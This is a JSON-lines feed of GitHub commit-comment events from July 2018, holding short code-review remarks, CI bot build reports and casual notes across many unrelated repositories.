{"id":"7927969703","type":"CommitCommentEvent","actor":{"login":"idegtiarov"},"repo":{"name":"raccoongang/edx-platform"},"payload":{"comment":{"id":29619094,"position":24,"line":4,"path":"lms/djangoapps/branding/forms.py","commit_id":"4efefa3511a803881781a2f02d0727aed277ee92","created_at":"2018-07-06T09:52:51Z","updated_at":"2018-07-06T09:52:51Z","author_association":"NONE","body":"Is it ok that items which are taken from the generic dict have unpredictable order?"}},"created_at":"2018-07-06T09:52:51Z"}
{"id":"7927969765","type":"CommitCommentEvent","actor":{"login":"MrAlex94"},"repo":{"name":"MrAlex94/Waterfox"},"payload":{"comment":{"id":29619095,"position":null,"line":null,"path":null,"commit_id":"b7b9ee7ce07ce3082a9609b20f036483690a7a71","created_at":"2018-07-06T09:52:52Z","updated_at":"2018-07-06T09:52:52Z","author_association":"OWNER","body":"Just testing now, if no issues then will tag :-)"}},"created_at":"2018-07-06T09:52:52Z"}
{"id":"7927986078","type":"CommitCommentEvent","actor":{"login":"mikkelfj"},"repo":{"name":"quicwg/base-drafts"},"payload":{"comment":{"id":29619115,"position":430,"line":3316,"path":"draft-ietf-quic-transport.md","commit_id":"3aea50db51a14f2b42ed8aea7dbeeea72c6321b4","created_at":"2018-07-06T09:56:12Z","updated_at":"2018-07-06T09:56:12Z","author_association":"NONE","body":"CRYPTO_HS, now aka CRYPTO"}},"created_at":"2018-07-06T09:56:12Z"}
{"id":"7927992637","type":"CommitCommentEvent","actor":{"login":"yangxuebo-138"},"repo":{"name":"swtcpro/jingtum-lib-go"},"payload":{"comment":{"id":29619133,"position":12,"line":40,"path":"src/jingtumLib/jingtumBaseLib/keypairs_test.go","commit_id":"471fe28106f9c19cfb0b27ad919f34bfeab57ce6","created_at":"2018-07-06T09:57:29Z","updated_at":"2018-07-06T09:57:29Z","author_association":"COLLABORATOR","body":"fff"}},"created_at":"2018-07-06T09:57:29Z"}
{"id":"7927993662","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29619135,"position":8,"line":298,"path":"xwiki-platform-core/xwiki-platform-notifications/xwiki-platform-notifications-ui/src/main/resources/XWiki/Notifications/Code/NotificationsMacro.xml","commit_id":"cc4eadd4e9ea1c369a912bf0c80e440e183b6d20","created_at":"2018-07-06T09:57:41Z","updated_at":"2018-07-06T09:57:41Z","author_association":"MEMBER","body":"Is it really the \"best way\"? Shouldn't we return a `Cache-Control` response header instead to tell the browser to not cache it?"}},"created_at":"2018-07-06T09:57:41Z"}
{"id":"7927993778","type":"CommitCommentEvent","actor":{"login":"yangxuebo-138"},"repo":{"name":"swtcpro/jingtum-lib-go"},"payload":{"comment":{"id":29619136,"position":13,"line":41,"path":"src/jingtumLib/jingtumBaseLib/keypairs_test.go","commit_id":"471fe28106f9c19cfb0b27ad919f34bfeab57ce6","created_at":"2018-07-06T09:57:43Z","updated_at":"2018-07-06T09:57:43Z","author_association":"COLLABORATOR","body":"ttt"}},"created_at":"2018-07-06T09:57:43Z"}
{"id":"7927997784","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29619150,"position":8,"line":298,"path":"xwiki-platform-core/xwiki-platform-notifications/xwiki-platform-notifications-ui/src/main/resources/XWiki/Notifications/Code/NotificationsMacro.xml","commit_id":"cc4eadd4e9ea1c369a912bf0c80e440e183b6d20","created_at":"2018-07-06T09:58:32Z","updated_at":"2018-07-06T09:58:32Z","author_association":"MEMBER","body":"Also could you explain the relationship of this fix with IE (the jira issue mentions it happens on IE)? Thx"}},"created_at":"2018-07-06T09:58:32Z"}
{"id":"7928002124","type":"CommitCommentEvent","actor":{"login":"kutsan"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29619164,"position":79,"line":63,"path":"init.vim","commit_id":"a1cdb1621422c940b134aaf59296335eb7aa8a45","created_at":"2018-07-06T09:59:29Z","updated_at":"2018-07-06T09:59:29Z","author_association":"NONE","body":"I'm going to say instead of doing that, do this:\r\n\r\n```vim\r\nset tabstop=2\r\nset shiftwidth=0 \" Always have the same value with `tabstop`.\r\nset softtabstop=-1 \" Always have the same value with `shiftwidth`.\r\nset expantab\r\n```\r\n\r\nThat way you can effectively change the indentation level on the go for different projects if their indentation level is different from your settings.\r\n\r\nFor example:\r\n\r\n`:set ts=4 et`\r\n`:set ts=2 noet`"}},"created_at":"2018-07-06T09:59:29Z"}
{"id":"7931417078","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29627568,"position":26,"line":26,"path":"lesson8/cargo_wagon.rb","commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-07T00:00:15Z","updated_at":"2018-07-07T00:00:15Z","author_association":"NONE","body":"В суперкласс"}},"created_at":"2018-07-07T00:00:15Z"}
{"id":"7931417761","type":"CommitCommentEvent","actor":{"login":"vitorgamer58"},"repo":{"name":"InfraexDev/peatio"},"payload":{"comment":{"id":29627576,"position":null,"line":null,"path":null,"commit_id":"6848ecb0a231e17ea35b2a307d3c610b2f84f34e","created_at":"2018-07-07T00:00:30Z","updated_at":"2018-07-07T00:00:30Z","author_association":"NONE","body":"i get this\r\n\r\n```\r\n\r\n*** Start nbr liability proof generation ***\r\nGenerating root node ..\r\nGenerating partial trees ..\r\n4 partial trees generated.\r\n\r\n*** Fetching nbr total assets ***\r\naddress balances fetched.\r\n\r\n*** Start dash liability proof generation ***\r\nComplete.\r\nrake aborted!\r\nDon't know how to build task 'mate'\r\n/home/deploy/.rbenv/versions/2.2.1/lib/ruby/2.2.0/rake/task_manager.rb:62:in `[]'\r\n/home/deploy/.rbenv/versions/2.2.1/lib/ruby/2.2.0/rake/application.rb:149:in `invoke_task'\r\n/home/deploy/.rbenv/versions/2.2.1/lib/ruby/2.2.0/rake/application.rb:106:in `block (2 levels) in top_level'\r\n/home/deploy/.rbenv/versions/2.2.1/lib/ruby/2.2.0/rake/application.rb:106:in `each'\r\n/home/deploy/.rbenv/versions/2.2.1/lib/ruby/2.2.0/rake/application.rb:106:in `block in top_level'\r\n/home/deploy/.rbenv/versions/2.2.1/lib/ruby/2.2.0/rake/application.rb:115:in `run_with_threads'\r\n/home/deploy/.rbenv/versions/2.2.1/lib/ruby/2.2.0/rake/application.rb:100:in `top_level'\r\n/home/deploy/.rbenv/versions/2.2.1/lib/ruby/2.2.0/rake/application.rb:78:in `block in run'\r\n/home/deploy/.rbenv/versions/2.2.1/lib/ruby/2.2.0/rake/application.rb:176:in `standard_exception_handling'\r\n/home/deploy/.rbenv/versions/2.2.1/lib/ruby/2.2.0/rake/application.rb:75:in `run'\r\n/home/deploy/.rbenv/versions/2.2.1/bin/rake:33:in `<main>'\r\n```\r\n"}},"created_at":"2018-07-07T00:00:30Z"}
{"id":"7931420380","type":"CommitCommentEvent","actor":{"login":"vivekTestGit"},"repo":{"name":"vivekTestGit/hello-git"},"payload":{"comment":{"id":29627580,"position":null,"line":null,"path":null,"commit_id":"327a9b1cd0563d6ea1589209d506dd751dc0712f","created_at":"2018-07-07T00:01:47Z","updated_at":"2018-07-07T00:01:47Z","author_association":"OWNER","body":"Let's See How Branches Merge!!"}},"created_at":"2018-07-07T00:01:47Z"}
{"id":"7931422229","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29627583,"position":null,"line":null,"path":null,"commit_id":"f28252ae7f59670e877061658cb54b128d638f94","created_at":"2018-07-07T00:02:50Z","updated_at":"2018-07-07T00:02:50Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.727.f28252ae7f59670e877061658cb54b128d638f94](http://build.palaso.org/viewLog.html?buildId=124370&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:36"}},"created_at":"2018-07-07T00:02:50Z"}
{"id":"7931424018","type":"CommitCommentEvent","actor":{"login":"fsaris"},"repo":{"name":"beechit/bynder"},"payload":{"comment":{"id":29627587,"position":4,"line":64,"path":"Classes/Resource/AssetProcessing.php","commit_id":"41720ca1f79a379926f4a9ec3bb00044868d8b87","created_at":"2018-07-07T00:03:49Z","updated_at":"2018-07-07T00:03:49Z","author_association":"NONE","body":"This is a debug leftover?"}},"created_at":"2018-07-07T00:03:49Z"}
{"id":"7931426143","type":"CommitCommentEvent","actor":{"login":"HakanIlbas"},"repo":{"name":"HakanIlbas/abcdecrapifier"},"payload":{"comment":{"id":29627592,"position":null,"line":null,"path":null,"commit_id":"429aa174de2a5a37cf50bc805851a880c7fa2ed2","created_at":"2018-07-07T00:04:56Z","updated_at":"2018-07-07T00:04:56Z","author_association":"OWNER","body":"Solves #3"}},"created_at":"2018-07-07T00:04:56Z"}
{"id":"7931426274","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29627593,"position":252,"line":252,"path":"lesson8/interface.rb","commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-07T00:05:01Z","updated_at":"2018-07-07T00:05:01Z","author_association":"NONE","body":"Тут есть смысл взять поезда, которые у нас в ```@trains```.  По идее именно в trains будут записываться все поезда из текущей сессии пользователя"}},"created_at":"2018-07-07T00:05:01Z"}
{"id":"7931430766","type":"CommitCommentEvent","actor":{"login":"karlsecco"},"repo":{"name":"karlsecco/react-like-button-toggle"},"payload":{"comment":{"id":29627609,"position":null,"line":null,"path":null,"commit_id":"eb20be5b983fdecf490821c109e9acdd289c2bda","created_at":"2018-07-07T00:07:27Z","updated_at":"2018-07-07T00:07:27Z","author_association":"OWNER","body":"inline md styling does not work"}},"created_at":"2018-07-07T00:07:27Z"}
{"id":"7931433093","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29627617,"position":6,"line":6,"path":"lesson8/passenger_wagon.rb","commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-07T00:08:49Z","updated_at":"2018-07-07T00:08:49Z","author_association":"NONE","body":"Смотри комментарии к CargoWagon"}},"created_at":"2018-07-07T00:08:49Z"}
{"id":"7931434831","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29627623,"position":null,"line":null,"path":null,"commit_id":"98a74b308a134118b92e98befa2e37e549048ab0","created_at":"2018-07-07T00:09:36Z","updated_at":"2018-07-07T00:09:36Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-752](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-752).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-752-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-07T00:09:36Z"}
{"id":"7931435556","type":"CommitCommentEvent","actor":{"login":"kUNQIjIANG"},"repo":{"name":"kUNQIjIANG/NMT"},"payload":{"comment":{"id":29627625,"position":null,"line":null,"path":null,"commit_id":"a63bec7520df130c06068010ce6ee2605f60b2ee","created_at":"2018-07-07T00:10:03Z","updated_at":"2018-07-07T00:10:03Z","author_association":"OWNER","body":"wake sleep graph"}},"created_at":"2018-07-07T00:10:03Z"}
{"id":"7931436553","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29627629,"position":24,"line":24,"path":"lesson8/passenger_wagon.rb","commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-07T00:10:37Z","updated_at":"2018-07-07T00:10:37Z","author_association":"NONE","body":"Смотри комментарии к CargoWagon. Подумай, как можно вынести максимум функционала в суперкласс"}},"created_at":"2018-07-07T00:10:37Z"}
{"id":"7931437716","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29627634,"position":null,"line":null,"path":null,"commit_id":"f28252ae7f59670e877061658cb54b128d638f94","created_at":"2018-07-07T00:11:17Z","updated_at":"2018-07-07T00:11:17Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests - untagged [Build *.*.41.f28252ae7f59670e877061658cb54b128d638f94](http://build.palaso.org/viewLog.html?buildId=124369&buildTypeId=Glyssen_GlyssenPullRequestsUntagged) outcome was **SUCCESS**\nSummary: Tests passed: 1845, ignored: 18 Build time: 00:09:03"}},"created_at":"2018-07-07T00:11:17Z"}
{"id":"7931438171","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29627635,"position":null,"line":null,"path":null,"commit_id":"f75ab79a39a67e42b0b08d801d5086dd3d68df7d","created_at":"2018-07-07T00:11:34Z","updated_at":"2018-07-07T00:11:34Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-755](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-755).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-755-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-07T00:11:34Z"}
{"id":"7931445991","type":"CommitCommentEvent","actor":{"login":"PEPEInvest"},"repo":{"name":"corpetty/py-etherscan-api"},"payload":{"comment":{"id":29627652,"position":null,"line":null,"path":null,"commit_id":"483d361ecbac00a4cd5965c7ba61d1b580c83376","created_at":"2018-07-07T00:15:47Z","updated_at":"2018-07-07T00:15:47Z","author_association":"NONE","body":"update-patch"}},"created_at":"2018-07-07T00:15:47Z"}
{"id":"7931446907","type":"CommitCommentEvent","actor":{"login":"w7788129"},"repo":{"name":"corpetty/py-etherscan-api"},"payload":{"comment":{"id":29627654,"position":46,"line":53,"path":"etherscan/proxies.py","commit_id":"e14b1ef8faf2ab5116469828ec68e6c7e0b4b041","created_at":"2018-07-07T00:16:13Z","updated_at":"2018-07-07T00:16:13Z","author_association":"NONE","body":"w7788129"}},"created_at":"2018-07-07T00:16:13Z"}
{"id":"7931449407","type":"CommitCommentEvent","actor":{"login":"grastogi23"},"repo":{"name":"avinetworks/ansible-role-aviconfig"},"payload":{"comment":{"id":29627669,"position":null,"line":null,"path":null,"commit_id":"d647b59b80131e0b5a592784b39c8416658ad0ce","created_at":"2018-07-07T00:17:49Z","updated_at":"2018-07-07T00:17:49Z","author_association":"CONTRIBUTOR","body":"AV-41799 #commit"}},"created_at":"2018-07-07T00:17:49Z"}
{"id":"7931449542","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"xxmicloxx/NoteBlockAPI"},"payload":{"comment":{"id":29627670,"position":13,"line":93,"path":"src/main/java/com/xxmicloxx/NoteBlockAPI/SongPlayer.java","commit_id":"af22f61ececac1eb7648e1b0a289059393fb1f08","created_at":"2018-07-07T00:17:54Z","updated_at":"2018-07-07T00:17:54Z","author_association":"NONE","body":"-1 instead"}},"created_at":"2018-07-07T00:17:54Z"}
{"id":"7931450920","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29627675,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-07T00:18:50Z","updated_at":"2018-07-07T00:18:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T00:18:50Z"}
{"id":"7931452550","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29627681,"position":null,"line":null,"path":null,"commit_id":"dd7fd483d5792d7a740f41d531af9ee3d2ef175e","created_at":"2018-07-07T00:19:51Z","updated_at":"2018-07-07T00:19:51Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-107](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-107).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-107-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-07T00:19:51Z"}
{"id":"7931453062","type":"CommitCommentEvent","actor":{"login":"w7788129"},"repo":{"name":"corpetty/py-etherscan-api"},"payload":{"comment":{"id":29627682,"position":59,"line":131,"path":"etherscan/client.py","commit_id":"e14b1ef8faf2ab5116469828ec68e6c7e0b4b041","created_at":"2018-07-07T00:20:10Z","updated_at":"2018-07-07T00:20:10Z","author_association":"NONE","body":"b1682e09fef84a7bae0126fb67a8da1a"}},"created_at":"2018-07-07T00:20:10Z"}
{"id":"7931453512","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":29627684,"position":null,"line":null,"path":null,"commit_id":"41da12e6bdc213c6aa331d59ee9a60a2a1103e57","created_at":"2018-07-07T00:20:26Z","updated_at":"2018-07-07T00:20:26Z","author_association":"OWNER","body":"I don't understand what the reassignment to `target` fixes here..."}},"created_at":"2018-07-07T00:20:26Z"}
{"id":"7931455083","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29627689,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-07T00:21:34Z","updated_at":"2018-07-07T00:21:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T00:21:34Z"}
{"id":"7931455247","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29627690,"position":61,"line":61,"path":"lesson8/route.rb","commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-07T00:21:41Z","updated_at":"2018-07-07T00:21:41Z","author_association":"NONE","body":"Вот тут, проверка :60 строки входит в проверку :61. Потому-что nil не instance_of? String. Да и если подумать, то проверка id на nil никогда не пригодится, потому-что для этого, при создании объекта нужно не передать ни одного аргумента. (Ruby выбросит wrong number of arguments ). Да и получаешь ты эти данные от пользователя, то есть из метода gets. А метод gets всегда вернет строку, даже, если в ней ничего не ввести. Только пустую строку (которая, кстати пройдет валидацию)"}},"created_at":"2018-07-07T00:21:41Z"}
{"id":"7931470115","type":"CommitCommentEvent","actor":{"login":"MarcusHurney"},"repo":{"name":"input-output-hk/react-polymorph"},"payload":{"comment":{"id":29627726,"position":null,"line":null,"path":null,"commit_id":"12490fbb4480021a55fd1154e25f8636aead3b8f","created_at":"2018-07-07T00:31:23Z","updated_at":"2018-07-07T00:31:23Z","author_association":"CONTRIBUTOR","body":"@DominikGuzei \r\nPreviously the `.errored` class definition was nested within `.input`. Additionally, `.errored` was defined before `:focus` which overwrites `.errored`'s border color definitions via cascade. This is what was causing the bug in DDW-245. This also made it difficult to compose styles via theme overrides because SimpleInput.scss is always going to have higher specificity unless the user nests his/her class definitions more specifically. This is not obvious to most people unless they open up the source code and also recognize this specificity battle. It seems I didn't completely de-nest SimpleInput.scss in the past, but now it's good to go and I also added an `.errored` state to the theme overrides stories for both Input and NumericInput to ensure this is working."}},"created_at":"2018-07-07T00:31:23Z"}
{"id":"7931472030","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29627728,"position":null,"line":null,"path":null,"commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-07T00:32:40Z","updated_at":"2018-07-07T00:32:40Z","author_association":"NONE","body":"Не нашел этого пункта\r\n - Выводить список вагонов у поезда (в указанном выше формате), используя созданные методы"}},"created_at":"2018-07-07T00:32:40Z"}
{"id":"7931473061","type":"CommitCommentEvent","actor":{"login":"EnriqueTutuyo"},"repo":{"name":"EnriqueTutuyo/ADE7858"},"payload":{"comment":{"id":29627730,"position":null,"line":null,"path":null,"commit_id":"0f6b366df0b9fcf13b0d27152582175524bea4f8","created_at":"2018-07-07T00:33:25Z","updated_at":"2018-07-07T00:33:25Z","author_association":"OWNER","body":"\r\nI am new and I need help to start this project"}},"created_at":"2018-07-07T00:33:25Z"}
{"id":"7931473554","type":"CommitCommentEvent","actor":{"login":"EnriqueTutuyo"},"repo":{"name":"EnriqueTutuyo/ADE7858"},"payload":{"comment":{"id":29627734,"position":null,"line":null,"path":null,"commit_id":"9719564dfd50dcbaca240e19cc126b42b5c9d712","created_at":"2018-07-07T00:33:47Z","updated_at":"2018-07-07T00:33:47Z","author_association":"OWNER","body":"\r\nI am new and I need help to start this project"}},"created_at":"2018-07-07T00:33:47Z"}
{"id":"7931474648","type":"CommitCommentEvent","actor":{"login":"Erveon"},"repo":{"name":"npm/hosted-git-info"},"payload":{"comment":{"id":29627741,"position":4,"line":61,"path":"index.js","commit_id":"3349575ea7a9fa70af72f24e1ca4507ac9948a9b","created_at":"2018-07-07T00:34:33Z","updated_at":"2018-07-07T00:34:33Z","author_association":"NONE","body":"This causes TypeError: Cannot read property 'replace' of null for certain libraries."}},"created_at":"2018-07-07T00:34:33Z"}
{"id":"7931475933","type":"CommitCommentEvent","actor":{"login":"Erveon"},"repo":{"name":"npm/hosted-git-info"},"payload":{"comment":{"id":29627748,"position":5,"line":61,"path":"index.js","commit_id":"3349575ea7a9fa70af72f24e1ca4507ac9948a9b","created_at":"2018-07-07T00:35:26Z","updated_at":"2018-07-07T00:35:26Z","author_association":"NONE","body":"This causes TypeError: Cannot read property 'replace' of null for certain libraries."}},"created_at":"2018-07-07T00:35:26Z"}
{"id":"7931476780","type":"CommitCommentEvent","actor":{"login":"agildav"},"repo":{"name":"agildav/smartbrain"},"payload":{"comment":{"id":29627751,"position":null,"line":null,"path":null,"commit_id":"39751f8a61016ee703fde4d341022a85d0db6837","created_at":"2018-07-07T00:36:00Z","updated_at":"2018-07-07T00:36:00Z","author_association":"OWNER","body":"Merged gh-pages / master"}},"created_at":"2018-07-07T00:36:00Z"}
{"id":"7931483686","type":"CommitCommentEvent","actor":{"login":"travis"},"repo":{"name":"isnullxbh/signals"},"payload":{"comment":{"id":29627770,"position":null,"line":null,"path":null,"commit_id":"e91af05a4c7bf24e1fa28b63bbbc47b10a28d6ae","created_at":"2018-07-07T00:40:24Z","updated_at":"2018-07-07T00:40:24Z","author_association":"NONE","body":"no prob!\n\nOn Fri, Jul 6, 2018 at 11:16 AM isnullxbh <notifications@github.com> wrote:\n\n> @travis <https://github.com/travis>, sorry for that, dear friend! I use\n> tags like it do AngularJS command :) I don't want to be a nuisance and I\n> can stop doing this (write tags with 'at' symbol)\n>\n> —\n>\n>\n> You are receiving this because you were mentioned.\n>\n> Reply to this email directly, view it on GitHub\n> <https://github.com/isnullxbh/signals/commit/e91af05a4c7bf24e1fa28b63bbbc47b10a28d6ae#commitcomment-29624733>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAAEWXuhs1XbO5_YgxT9q3vE8xWIdFVCks5uD6l1gaJpZM4VD03f>\n> .\n>\n"}},"created_at":"2018-07-07T00:40:24Z"}
{"id":"7931483672","type":"CommitCommentEvent","actor":{"login":"jjustin25"},"repo":{"name":"jjustin25/Crime-Project-1"},"payload":{"comment":{"id":29627771,"position":null,"line":null,"path":null,"commit_id":"2466ad1ac2ec52b182ef119b60c6ebc7cbbe27e6","created_at":"2018-07-07T00:40:25Z","updated_at":"2018-07-07T00:40:25Z","author_association":"OWNER","body":"merging to master"}},"created_at":"2018-07-07T00:40:25Z"}
{"id":"7931483980","type":"CommitCommentEvent","actor":{"login":"EnriqueTutuyo"},"repo":{"name":"augustecolle/ADE7758_example"},"payload":{"comment":{"id":29627772,"position":null,"line":null,"path":null,"commit_id":"073119ef8e9df9a7d8f88814a4e647abd910a41a","created_at":"2018-07-07T00:40:39Z","updated_at":"2018-07-07T00:40:39Z","author_association":"NONE","body":"\r\ngood night, I'm starting a project with an ade7858 and I'm based on your code, but I need help, you could help me."}},"created_at":"2018-07-07T00:40:39Z"}
{"id":"7931489805","type":"CommitCommentEvent","actor":{"login":"iiFlamiinBlaze"},"repo":{"name":"Zedstar16/BlazinFly"},"payload":{"comment":{"id":29627779,"position":null,"line":null,"path":null,"commit_id":"c623eac71c3e5ca2722caf6e42a22c10d81cbdb1","created_at":"2018-07-07T00:45:11Z","updated_at":"2018-07-07T00:45:11Z","author_association":"NONE","body":"YOu should have updated your server by now to 3.0.0 cmon lmao"}},"created_at":"2018-07-07T00:45:11Z"}
{"id":"7931490820","type":"CommitCommentEvent","actor":{"login":"iiFlamiinBlaze"},"repo":{"name":"Zedstar16/BlazinFly"},"payload":{"comment":{"id":29627783,"position":9,"line":115,"path":"src/iiFlamiinBlaze/BlazinFly/BlazinFly.php","commit_id":"e15147da3ecb8a3a44bb7cca01c647375acefff1","created_at":"2018-07-07T00:45:53Z","updated_at":"2018-07-07T00:45:53Z","author_association":"NONE","body":"undefined method $damager lmfao, if you are gonna try and \"fix\" something that isn't broken, at least learn a little PHP and OOP first :P"}},"created_at":"2018-07-07T00:45:53Z"}
{"id":"7931499018","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29627790,"position":6,"line":8,"path":"contracts/Splitter.sol","commit_id":"2d32daac6ff4f50707532a122cb93c69644935b9","created_at":"2018-07-07T00:51:48Z","updated_at":"2018-07-07T00:51:48Z","author_association":"NONE","body":"You can add `public` here and then you won't need the two address inspectors that follow. "}},"created_at":"2018-07-07T00:51:48Z"}
{"id":"7931499644","type":"CommitCommentEvent","actor":{"login":"Rikk"},"repo":{"name":"yeriomin/YalpStore"},"payload":{"comment":{"id":29627791,"position":null,"line":null,"path":null,"commit_id":"9189c5527ba027abd12ea549c95facf9d26da6fe","created_at":"2018-07-07T00:52:19Z","updated_at":"2018-07-07T00:52:19Z","author_association":"NONE","body":"It would also be appreciated an option to stop all downloads, especially when we accidentally tap the big button that downloads all updates."}},"created_at":"2018-07-07T00:52:19Z"}
{"id":"7931500322","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29627793,"position":6,"line":8,"path":"contracts/Splitter.sol","commit_id":"2d32daac6ff4f50707532a122cb93c69644935b9","created_at":"2018-07-07T00:52:51Z","updated_at":"2018-07-07T00:52:51Z","author_association":"NONE","body":"Did you notice that you have a mapping that can theoretically hold all the balances for all the addresses - not just the two you're concerned with? You're sneaking up on the stretch goals. ;-)"}},"created_at":"2018-07-07T00:52:51Z"}
{"id":"7931501474","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29627794,"position":9,"line":11,"path":"contracts/Splitter.sol","commit_id":"2d32daac6ff4f50707532a122cb93c69644935b9","created_at":"2018-07-07T00:53:49Z","updated_at":"2018-07-07T00:53:49Z","author_association":"NONE","body":"You don't need `address Alice` because that is `msg.sender` who has signed the transaction. That is more trustworthy than the data they pass in voluntarily. "}},"created_at":"2018-07-07T00:53:49Z"}
{"id":"7931501577","type":"CommitCommentEvent","actor":{"login":"RajaaBoulassouak"},"repo":{"name":"RajaaBoulassouak/Night-Writer"},"payload":{"comment":{"id":29627796,"position":null,"line":null,"path":null,"commit_id":"3b9725fc56e11597d497e651c41ca3b3c51d2703","created_at":"2018-07-07T00:53:54Z","updated_at":"2018-07-07T00:53:54Z","author_association":"OWNER","body":"This looks great! "}},"created_at":"2018-07-07T00:53:54Z"}
{"id":"7931503169","type":"CommitCommentEvent","actor":{"login":"cormacrelf"},"repo":{"name":"valor-software/ng2-dragula"},"payload":{"comment":{"id":29627798,"position":null,"line":null,"path":null,"commit_id":"98e00157e89c76f66a4d3905f40bcbac10367ad8","created_at":"2018-07-07T00:55:04Z","updated_at":"2018-07-07T00:55:04Z","author_association":"COLLABORATOR","body":"There is a milestone for 1.6.0, but it is not released."}},"created_at":"2018-07-07T00:55:04Z"}
